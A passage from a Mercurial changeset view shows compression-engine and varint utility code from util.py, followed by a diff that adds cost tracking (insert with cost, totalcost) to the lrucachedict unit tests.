3391 3412 if safehasattr(fh, 'unbufferedread'):
3392 3413 self._reader = fh.unbufferedread
3393 3414 else:
3394 3415 self._reader = fh.read
3395 3416 self._pending = []
3396 3417 self._pos = 0
3397 3418 self._eof = False
3398 3419
3399 3420 def _decompress(self, chunk):
3400 3421 raise NotImplementedError()
3401 3422
3402 3423 def read(self, l):
3403 3424 buf = []
3404 3425 while True:
3405 3426 while self._pending:
3406 3427 if len(self._pending[0]) > l + self._pos:
3407 3428 newbuf = self._pending[0]
3408 3429 buf.append(newbuf[self._pos:self._pos + l])
3409 3430 self._pos += l
3410 3431 return ''.join(buf)
3411 3432
3412 3433 newbuf = self._pending.pop(0)
3413 3434 if self._pos:
3414 3435 buf.append(newbuf[self._pos:])
3415 3436 l -= len(newbuf) - self._pos
3416 3437 else:
3417 3438 buf.append(newbuf)
3418 3439 l -= len(newbuf)
3419 3440 self._pos = 0
3420 3441
3421 3442 if self._eof:
3422 3443 return ''.join(buf)
3423 3444 chunk = self._reader(65536)
3424 3445 self._decompress(chunk)
3425 3446 if not chunk and not self._pending and not self._eof:
3426 3447 # No progress and no new data, bail out
3427 3448 return ''.join(buf)
3428 3449
3429 3450 class _GzipCompressedStreamReader(_CompressedStreamReader):
3430 3451 def __init__(self, fh):
3431 3452 super(_GzipCompressedStreamReader, self).__init__(fh)
3432 3453 self._decompobj = zlib.decompressobj()
3433 3454 def _decompress(self, chunk):
3434 3455 newbuf = self._decompobj.decompress(chunk)
3435 3456 if newbuf:
3436 3457 self._pending.append(newbuf)
3437 3458 d = self._decompobj.copy()
3438 3459 try:
3439 3460 d.decompress('x')
3440 3461 d.flush()
3441 3462 if d.unused_data == 'x':
3442 3463 self._eof = True
3443 3464 except zlib.error:
3444 3465 pass
3445 3466
3446 3467 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3447 3468 def __init__(self, fh):
3448 3469 super(_BZ2CompressedStreamReader, self).__init__(fh)
3449 3470 self._decompobj = bz2.BZ2Decompressor()
3450 3471 def _decompress(self, chunk):
3451 3472 newbuf = self._decompobj.decompress(chunk)
3452 3473 if newbuf:
3453 3474 self._pending.append(newbuf)
3454 3475 try:
3455 3476 while True:
3456 3477 newbuf = self._decompobj.decompress('')
3457 3478 if newbuf:
3458 3479 self._pending.append(newbuf)
3459 3480 else:
3460 3481 break
3461 3482 except EOFError:
3462 3483 self._eof = True
3463 3484
3464 3485 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3465 3486 def __init__(self, fh):
3466 3487 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3467 3488 newbuf = self._decompobj.decompress('BZ')
3468 3489 if newbuf:
3469 3490 self._pending.append(newbuf)
3470 3491
3471 3492 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3472 3493 def __init__(self, fh, zstd):
3473 3494 super(_ZstdCompressedStreamReader, self).__init__(fh)
3474 3495 self._zstd = zstd
3475 3496 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3476 3497 def _decompress(self, chunk):
3477 3498 newbuf = self._decompobj.decompress(chunk)
3478 3499 if newbuf:
3479 3500 self._pending.append(newbuf)
3480 3501 try:
3481 3502 while True:
3482 3503 newbuf = self._decompobj.decompress('')
3483 3504 if newbuf:
3484 3505 self._pending.append(newbuf)
3485 3506 else:
3486 3507 break
3487 3508 except self._zstd.ZstdError:
3488 3509 self._eof = True
3489 3510
3490 3511 class _zlibengine(compressionengine):
3491 3512 def name(self):
3492 3513 return 'zlib'
3493 3514
3494 3515 def bundletype(self):
3495 3516 """zlib compression using the DEFLATE algorithm.
3496 3517
3497 3518 All Mercurial clients should support this format. The compression
3498 3519 algorithm strikes a reasonable balance between compression ratio
3499 3520 and size.
3500 3521 """
3501 3522 return 'gzip', 'GZ'
3502 3523
3503 3524 def wireprotosupport(self):
3504 3525 return compewireprotosupport('zlib', 20, 20)
3505 3526
3506 3527 def revlogheader(self):
3507 3528 return 'x'
3508 3529
3509 3530 def compressstream(self, it, opts=None):
3510 3531 opts = opts or {}
3511 3532
3512 3533 z = zlib.compressobj(opts.get('level', -1))
3513 3534 for chunk in it:
3514 3535 data = z.compress(chunk)
3515 3536 # Not all calls to compress emit data. It is cheaper to inspect
3516 3537 # here than to feed empty chunks through generator.
3517 3538 if data:
3518 3539 yield data
3519 3540
3520 3541 yield z.flush()
3521 3542
3522 3543 def decompressorreader(self, fh):
3523 3544 return _GzipCompressedStreamReader(fh)
3524 3545
3525 3546 class zlibrevlogcompressor(object):
3526 3547 def compress(self, data):
3527 3548 insize = len(data)
3528 3549 # Caller handles empty input case.
3529 3550 assert insize > 0
3530 3551
3531 3552 if insize < 44:
3532 3553 return None
3533 3554
3534 3555 elif insize <= 1000000:
3535 3556 compressed = zlib.compress(data)
3536 3557 if len(compressed) < insize:
3537 3558 return compressed
3538 3559 return None
3539 3560
3540 3561 # zlib makes an internal copy of the input buffer, doubling
3541 3562 # memory usage for large inputs. So do streaming compression
3542 3563 # on large inputs.
3543 3564 else:
3544 3565 z = zlib.compressobj()
3545 3566 parts = []
3546 3567 pos = 0
3547 3568 while pos < insize:
3548 3569 pos2 = pos + 2**20
3549 3570 parts.append(z.compress(data[pos:pos2]))
3550 3571 pos = pos2
3551 3572 parts.append(z.flush())
3552 3573
3553 3574 if sum(map(len, parts)) < insize:
3554 3575 return ''.join(parts)
3555 3576 return None
3556 3577
3557 3578 def decompress(self, data):
3558 3579 try:
3559 3580 return zlib.decompress(data)
3560 3581 except zlib.error as e:
3561 3582 raise error.RevlogError(_('revlog decompress error: %s') %
3562 3583 stringutil.forcebytestr(e))
3563 3584
3564 3585 def revlogcompressor(self, opts=None):
3565 3586 return self.zlibrevlogcompressor()
3566 3587
3567 3588 compengines.register(_zlibengine())
3568 3589
3569 3590 class _bz2engine(compressionengine):
3570 3591 def name(self):
3571 3592 return 'bz2'
3572 3593
3573 3594 def bundletype(self):
3574 3595 """An algorithm that produces smaller bundles than ``gzip``.
3575 3596
3576 3597 All Mercurial clients should support this format.
3577 3598
3578 3599 This engine will likely produce smaller bundles than ``gzip`` but
3579 3600 will be significantly slower, both during compression and
3580 3601 decompression.
3581 3602
3582 3603 If available, the ``zstd`` engine can yield similar or better
3583 3604 compression at much higher speeds.
3584 3605 """
3585 3606 return 'bzip2', 'BZ'
3586 3607
3587 3608 # We declare a protocol name but don't advertise by default because
3588 3609 # it is slow.
3589 3610 def wireprotosupport(self):
3590 3611 return compewireprotosupport('bzip2', 0, 0)
3591 3612
3592 3613 def compressstream(self, it, opts=None):
3593 3614 opts = opts or {}
3594 3615 z = bz2.BZ2Compressor(opts.get('level', 9))
3595 3616 for chunk in it:
3596 3617 data = z.compress(chunk)
3597 3618 if data:
3598 3619 yield data
3599 3620
3600 3621 yield z.flush()
3601 3622
3602 3623 def decompressorreader(self, fh):
3603 3624 return _BZ2CompressedStreamReader(fh)
3604 3625
3605 3626 compengines.register(_bz2engine())
3606 3627
3607 3628 class _truncatedbz2engine(compressionengine):
3608 3629 def name(self):
3609 3630 return 'bz2truncated'
3610 3631
3611 3632 def bundletype(self):
3612 3633 return None, '_truncatedBZ'
3613 3634
3614 3635 # We don't implement compressstream because it is hackily handled elsewhere.
3615 3636
3616 3637 def decompressorreader(self, fh):
3617 3638 return _TruncatedBZ2CompressedStreamReader(fh)
3618 3639
3619 3640 compengines.register(_truncatedbz2engine())
3620 3641
3621 3642 class _noopengine(compressionengine):
3622 3643 def name(self):
3623 3644 return 'none'
3624 3645
3625 3646 def bundletype(self):
3626 3647 """No compression is performed.
3627 3648
3628 3649 Use this compression engine to explicitly disable compression.
3629 3650 """
3630 3651 return 'none', 'UN'
3631 3652
3632 3653 # Clients always support uncompressed payloads. Servers don't because
3633 3654 # unless you are on a fast network, uncompressed payloads can easily
3634 3655 # saturate your network pipe.
3635 3656 def wireprotosupport(self):
3636 3657 return compewireprotosupport('none', 0, 10)
3637 3658
3638 3659 # We don't implement revlogheader because it is handled specially
3639 3660 # in the revlog class.
3640 3661
3641 3662 def compressstream(self, it, opts=None):
3642 3663 return it
3643 3664
3644 3665 def decompressorreader(self, fh):
3645 3666 return fh
3646 3667
3647 3668 class nooprevlogcompressor(object):
3648 3669 def compress(self, data):
3649 3670 return None
3650 3671
3651 3672 def revlogcompressor(self, opts=None):
3652 3673 return self.nooprevlogcompressor()
3653 3674
3654 3675 compengines.register(_noopengine())
3655 3676
3656 3677 class _zstdengine(compressionengine):
3657 3678 def name(self):
3658 3679 return 'zstd'
3659 3680
3660 3681 @propertycache
3661 3682 def _module(self):
3662 3683 # Not all installs have the zstd module available. So defer importing
3663 3684 # until first access.
3664 3685 try:
3665 3686 from . import zstd
3666 3687 # Force delayed import.
3667 3688 zstd.__version__
3668 3689 return zstd
3669 3690 except ImportError:
3670 3691 return None
3671 3692
3672 3693 def available(self):
3673 3694 return bool(self._module)
3674 3695
3675 3696 def bundletype(self):
3676 3697 """A modern compression algorithm that is fast and highly flexible.
3677 3698
3678 3699 Only supported by Mercurial 4.1 and newer clients.
3679 3700
3680 3701 With the default settings, zstd compression is both faster and yields
3681 3702 better compression than ``gzip``. It also frequently yields better
3682 3703 compression than ``bzip2`` while operating at much higher speeds.
3683 3704
3684 3705 If this engine is available and backwards compatibility is not a
3685 3706 concern, it is likely the best available engine.
3686 3707 """
3687 3708 return 'zstd', 'ZS'
3688 3709
3689 3710 def wireprotosupport(self):
3690 3711 return compewireprotosupport('zstd', 50, 50)
3691 3712
3692 3713 def revlogheader(self):
3693 3714 return '\x28'
3694 3715
3695 3716 def compressstream(self, it, opts=None):
3696 3717 opts = opts or {}
3697 3718 # zstd level 3 is almost always significantly faster than zlib
3698 3719 # while providing no worse compression. It strikes a good balance
3699 3720 # between speed and compression.
3700 3721 level = opts.get('level', 3)
3701 3722
3702 3723 zstd = self._module
3703 3724 z = zstd.ZstdCompressor(level=level).compressobj()
3704 3725 for chunk in it:
3705 3726 data = z.compress(chunk)
3706 3727 if data:
3707 3728 yield data
3708 3729
3709 3730 yield z.flush()
3710 3731
3711 3732 def decompressorreader(self, fh):
3712 3733 return _ZstdCompressedStreamReader(fh, self._module)
3713 3734
3714 3735 class zstdrevlogcompressor(object):
3715 3736 def __init__(self, zstd, level=3):
3716 3737 # TODO consider omitting frame magic to save 4 bytes.
3717 3738 # This writes content sizes into the frame header. That is
3718 3739 # extra storage. But it allows a correct size memory allocation
3719 3740 # to hold the result.
3720 3741 self._cctx = zstd.ZstdCompressor(level=level)
3721 3742 self._dctx = zstd.ZstdDecompressor()
3722 3743 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3723 3744 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3724 3745
3725 3746 def compress(self, data):
3726 3747 insize = len(data)
3727 3748 # Caller handles empty input case.
3728 3749 assert insize > 0
3729 3750
3730 3751 if insize < 50:
3731 3752 return None
3732 3753
3733 3754 elif insize <= 1000000:
3734 3755 compressed = self._cctx.compress(data)
3735 3756 if len(compressed) < insize:
3736 3757 return compressed
3737 3758 return None
3738 3759 else:
3739 3760 z = self._cctx.compressobj()
3740 3761 chunks = []
3741 3762 pos = 0
3742 3763 while pos < insize:
3743 3764 pos2 = pos + self._compinsize
3744 3765 chunk = z.compress(data[pos:pos2])
3745 3766 if chunk:
3746 3767 chunks.append(chunk)
3747 3768 pos = pos2
3748 3769 chunks.append(z.flush())
3749 3770
3750 3771 if sum(map(len, chunks)) < insize:
3751 3772 return ''.join(chunks)
3752 3773 return None
3753 3774
3754 3775 def decompress(self, data):
3755 3776 insize = len(data)
3756 3777
3757 3778 try:
3758 3779 # This was measured to be faster than other streaming
3759 3780 # decompressors.
3760 3781 dobj = self._dctx.decompressobj()
3761 3782 chunks = []
3762 3783 pos = 0
3763 3784 while pos < insize:
3764 3785 pos2 = pos + self._decompinsize
3765 3786 chunk = dobj.decompress(data[pos:pos2])
3766 3787 if chunk:
3767 3788 chunks.append(chunk)
3768 3789 pos = pos2
3769 3790 # Frame should be exhausted, so no finish() API.
3770 3791
3771 3792 return ''.join(chunks)
3772 3793 except Exception as e:
3773 3794 raise error.RevlogError(_('revlog decompress error: %s') %
3774 3795 stringutil.forcebytestr(e))
3775 3796
3776 3797 def revlogcompressor(self, opts=None):
3777 3798 opts = opts or {}
3778 3799 return self.zstdrevlogcompressor(self._module,
3779 3800 level=opts.get('level', 3))
3780 3801
3781 3802 compengines.register(_zstdengine())
3782 3803
3783 3804 def bundlecompressiontopics():
3784 3805 """Obtains a list of available bundle compressions for use in help."""
3785 3806 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3786 3807 items = {}
3787 3808
3788 3809 # We need to format the docstring. So use a dummy object/type to hold it
3789 3810 # rather than mutating the original.
3790 3811 class docobject(object):
3791 3812 pass
3792 3813
3793 3814 for name in compengines:
3794 3815 engine = compengines[name]
3795 3816
3796 3817 if not engine.available():
3797 3818 continue
3798 3819
3799 3820 bt = engine.bundletype()
3800 3821 if not bt or not bt[0]:
3801 3822 continue
3802 3823
3803 3824 doc = pycompat.sysstr('``%s``\n %s') % (
3804 3825 bt[0], engine.bundletype.__doc__)
3805 3826
3806 3827 value = docobject()
3807 3828 value.__doc__ = doc
3808 3829 value._origdoc = engine.bundletype.__doc__
3809 3830 value._origfunc = engine.bundletype
3810 3831
3811 3832 items[bt[0]] = value
3812 3833
3813 3834 return items
3814 3835
3815 3836 i18nfunctions = bundlecompressiontopics().values()
3816 3837
3817 3838 # convenient shortcut
3818 3839 dst = debugstacktrace
3819 3840
3820 3841 def safename(f, tag, ctx, others=None):
3821 3842 """
3822 3843 Generate a name that it is safe to rename f to in the given context.
3823 3844
3824 3845 f: filename to rename
3825 3846 tag: a string tag that will be included in the new name
3826 3847 ctx: a context, in which the new name must not exist
3827 3848 others: a set of other filenames that the new name must not be in
3828 3849
3829 3850 Returns a file name of the form oldname~tag[~number] which does not exist
3830 3851 in the provided context and is not in the set of other names.
3831 3852 """
3832 3853 if others is None:
3833 3854 others = set()
3834 3855
3835 3856 fn = '%s~%s' % (f, tag)
3836 3857 if fn not in ctx and fn not in others:
3837 3858 return fn
3838 3859 for n in itertools.count(1):
3839 3860 fn = '%s~%s~%s' % (f, tag, n)
3840 3861 if fn not in ctx and fn not in others:
3841 3862 return fn
3842 3863
3843 3864 def readexactly(stream, n):
3844 3865 '''read n bytes from stream.read and abort if less was available'''
3845 3866 s = stream.read(n)
3846 3867 if len(s) < n:
3847 3868 raise error.Abort(_("stream ended unexpectedly"
3848 3869 " (got %d bytes, expected %d)")
3849 3870 % (len(s), n))
3850 3871 return s
3851 3872
3852 3873 def uvarintencode(value):
3853 3874 """Encode an unsigned integer value to a varint.
3854 3875
3855 3876 A varint is a variable length integer of 1 or more bytes. Each byte
3856 3877 except the last has the most significant bit set. The lower 7 bits of
3857 3878 each byte store the 2's complement representation, least significant group
3858 3879 first.
3859 3880
3860 3881 >>> uvarintencode(0)
3861 3882 '\\x00'
3862 3883 >>> uvarintencode(1)
3863 3884 '\\x01'
3864 3885 >>> uvarintencode(127)
3865 3886 '\\x7f'
3866 3887 >>> uvarintencode(1337)
3867 3888 '\\xb9\\n'
3868 3889 >>> uvarintencode(65536)
3869 3890 '\\x80\\x80\\x04'
3870 3891 >>> uvarintencode(-1)
3871 3892 Traceback (most recent call last):
3872 3893 ...
3873 3894 ProgrammingError: negative value for uvarint: -1
3874 3895 """
3875 3896 if value < 0:
3876 3897 raise error.ProgrammingError('negative value for uvarint: %d'
3877 3898 % value)
3878 3899 bits = value & 0x7f
3879 3900 value >>= 7
3880 3901 bytes = []
3881 3902 while value:
3882 3903 bytes.append(pycompat.bytechr(0x80 | bits))
3883 3904 bits = value & 0x7f
3884 3905 value >>= 7
3885 3906 bytes.append(pycompat.bytechr(bits))
3886 3907
3887 3908 return ''.join(bytes)
3888 3909
3889 3910 def uvarintdecodestream(fh):
3890 3911 """Decode an unsigned variable length integer from a stream.
3891 3912
3892 3913 The passed argument is anything that has a ``.read(N)`` method.
3893 3914
3894 3915 >>> try:
3895 3916 ... from StringIO import StringIO as BytesIO
3896 3917 ... except ImportError:
3897 3918 ... from io import BytesIO
3898 3919 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3899 3920 0
3900 3921 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3901 3922 1
3902 3923 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3903 3924 127
3904 3925 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3905 3926 1337
3906 3927 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3907 3928 65536
3908 3929 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3909 3930 Traceback (most recent call last):
3910 3931 ...
3911 3932 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3912 3933 """
3913 3934 result = 0
3914 3935 shift = 0
3915 3936 while True:
3916 3937 byte = ord(readexactly(fh, 1))
3917 3938 result |= ((byte & 0x7f) << shift)
3918 3939 if not (byte & 0x80):
3919 3940 return result
3920 3941 shift += 7
@@ -1,201 +1,221 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 d['a'] = 'va'
15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 d['d'] = 'vd'
18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 self.assertEqual(d.totalcost, 44)
26
25 27 # 'a' should be dropped because it was least recently used.
26 28 d['e'] = 've'
27 29 self.assertNotIn('a', d)
28
29 30 self.assertIsNone(d.get('a'))
31 self.assertEqual(d.totalcost, 42)
30 32
31 33 self.assertEqual(d['b'], 'vb')
32 34 self.assertEqual(d['c'], 'vc')
33 35 self.assertEqual(d['d'], 'vd')
34 36 self.assertEqual(d['e'], 've')
35 37
38 # Replacing item with different cost adjusts totalcost.
39 d.insert('e', 've', cost=4)
40 self.assertEqual(d.totalcost, 46)
41
36 42 # Touch entries in some order (both get and set).
37 43 d['e']
38 44 d['c'] = 'vc2'
39 45 d['d']
40 46 d['b'] = 'vb2'
41 47
42 48 # 'e' should be dropped now
43 49 d['f'] = 'vf'
44 50 self.assertNotIn('e', d)
45 51 self.assertEqual(d['b'], 'vb2')
46 52 self.assertEqual(d['c'], 'vc2')
47 53 self.assertEqual(d['d'], 'vd')
48 54 self.assertEqual(d['f'], 'vf')
49 55
50 56 d.clear()
51 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
52 58 self.assertNotIn(key, d)
53 59
54 60 def testunfull(self):
55 61 d = util.lrucachedict(4)
56 62 d['a'] = 1
57 63 d['b'] = 2
58 64 d['a']
59 65 d['b']
60 66
61 67 for key in ('a', 'b'):
62 68 self.assertIn(key, d)
63 69
64 70 def testcopypartial(self):
65 71 d = util.lrucachedict(4)
66 d['a'] = 'va'
67 d['b'] = 'vb'
72 d.insert('a', 'va', cost=4)
73 d.insert('b', 'vb', cost=2)
68 74
69 75 dc = d.copy()
70 76
71 77 self.assertEqual(len(dc), 2)
78 self.assertEqual(dc.totalcost, 6)
72 79 for key in ('a', 'b'):
73 80 self.assertIn(key, dc)
74 81 self.assertEqual(dc[key], 'v%s' % key)
75 82
76 83 self.assertEqual(len(d), 2)
77 84 for key in ('a', 'b'):
78 85 self.assertIn(key, d)
79 86 self.assertEqual(d[key], 'v%s' % key)
80 87
81 88 d['c'] = 'vc'
82 89 del d['b']
90 self.assertEqual(d.totalcost, 4)
83 91 dc = d.copy()
84 92 self.assertEqual(len(dc), 2)
93 self.assertEqual(dc.totalcost, 4)
85 94 for key in ('a', 'c'):
86 95 self.assertIn(key, dc)
87 96 self.assertEqual(dc[key], 'v%s' % key)
88 97
89 98 def testcopyempty(self):
90 99 d = util.lrucachedict(4)
91 100 dc = d.copy()
92 101 self.assertEqual(len(dc), 0)
93 102
94 103 def testcopyfull(self):
95 104 d = util.lrucachedict(4)
96 d['a'] = 'va'
105 d.insert('a', 'va', cost=42)
97 106 d['b'] = 'vb'
98 107 d['c'] = 'vc'
99 108 d['d'] = 'vd'
100 109
101 110 dc = d.copy()
102 111
103 112 for key in ('a', 'b', 'c', 'd'):
104 113 self.assertIn(key, dc)
105 114 self.assertEqual(dc[key], 'v%s' % key)
106 115
116 self.assertEqual(d.totalcost, 42)
117 self.assertEqual(dc.totalcost, 42)
118
107 119 # 'a' should be dropped because it was least recently used.
108 120 dc['e'] = 've'
109 121 self.assertNotIn('a', dc)
110 122 for key in ('b', 'c', 'd', 'e'):
111 123 self.assertIn(key, dc)
112 124 self.assertEqual(dc[key], 'v%s' % key)
113 125
126 self.assertEqual(d.totalcost, 42)
127 self.assertEqual(dc.totalcost, 0)
128
114 129 # Contents and order of original dict should remain unchanged.
115 130 dc['b'] = 'vb_new'
116 131
117 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
118 133 for key in ('a', 'b', 'c', 'd'):
119 134 self.assertEqual(d[key], 'v%s' % key)
120 135
121 136 def testcopydecreasecapacity(self):
122 137 d = util.lrucachedict(5)
123 d['a'] = 'va'
124 d['b'] = 'vb'
138 d.insert('a', 'va', cost=4)
139 d.insert('b', 'vb', cost=2)
125 140 d['c'] = 'vc'
126 141 d['d'] = 'vd'
127 142
128 143 dc = d.copy(2)
144 self.assertEqual(dc.totalcost, 0)
129 145 for key in ('a', 'b'):
130 146 self.assertNotIn(key, dc)
131 147 for key in ('c', 'd'):
132 148 self.assertIn(key, dc)
133 149 self.assertEqual(dc[key], 'v%s' % key)
134 150
135 dc['e'] = 've'
151 dc.insert('e', 've', cost=7)
152 self.assertEqual(dc.totalcost, 7)
136 153 self.assertNotIn('c', dc)
137 154 for key in ('d', 'e'):
138 155 self.assertIn(key, dc)
139 156 self.assertEqual(dc[key], 'v%s' % key)
140 157
141 158 # Original should remain unchanged.
159 self.assertEqual(d.totalcost, 6)
142 160 for key in ('a', 'b', 'c', 'd'):
143 161 self.assertIn(key, d)
144 162 self.assertEqual(d[key], 'v%s' % key)
145 163
146 164 def testcopyincreasecapacity(self):
147 165 d = util.lrucachedict(5)
148 166 d['a'] = 'va'
149 167 d['b'] = 'vb'
150 168 d['c'] = 'vc'
151 169 d['d'] = 'vd'
152 170
153 171 dc = d.copy(6)
154 172 for key in ('a', 'b', 'c', 'd'):
155 173 self.assertIn(key, dc)
156 174 self.assertEqual(dc[key], 'v%s' % key)
157 175
158 176 dc['e'] = 've'
159 177 dc['f'] = 'vf'
160 178 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
161 179 self.assertIn(key, dc)
162 180 self.assertEqual(dc[key], 'v%s' % key)
163 181
164 182 dc['g'] = 'vg'
165 183 self.assertNotIn('a', dc)
166 184 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
167 185 self.assertIn(key, dc)
168 186 self.assertEqual(dc[key], 'v%s' % key)
169 187
170 188 # Original should remain unchanged.
171 189 for key in ('a', 'b', 'c', 'd'):
172 190 self.assertIn(key, d)
173 191 self.assertEqual(d[key], 'v%s' % key)
174 192
175 193 def testpopoldest(self):
176 194 d = util.lrucachedict(4)
177 d['a'] = 'va'
178 d['b'] = 'vb'
195 d.insert('a', 'va', cost=10)
196 d.insert('b', 'vb', cost=5)
179 197
180 198 self.assertEqual(len(d), 2)
181 199 self.assertEqual(d.popoldest(), ('a', 'va'))
182 200 self.assertEqual(len(d), 1)
201 self.assertEqual(d.totalcost, 5)
183 202 self.assertEqual(d.popoldest(), ('b', 'vb'))
184 203 self.assertEqual(len(d), 0)
204 self.assertEqual(d.totalcost, 0)
185 205 self.assertIsNone(d.popoldest())
186 206
187 207 d['a'] = 'va'
188 208 d['b'] = 'vb'
189 209 d['c'] = 'vc'
190 210 d['d'] = 'vd'
191 211
192 212 self.assertEqual(d.popoldest(), ('a', 'va'))
193 213 self.assertEqual(len(d), 3)
194 214 for key in ('b', 'c', 'd'):
195 215 self.assertEqual(d[key], 'v%s' % key)
196 216
197 217 d['a'] = 'va'
198 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
199 219
200 220 if __name__ == '__main__':
201 221 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now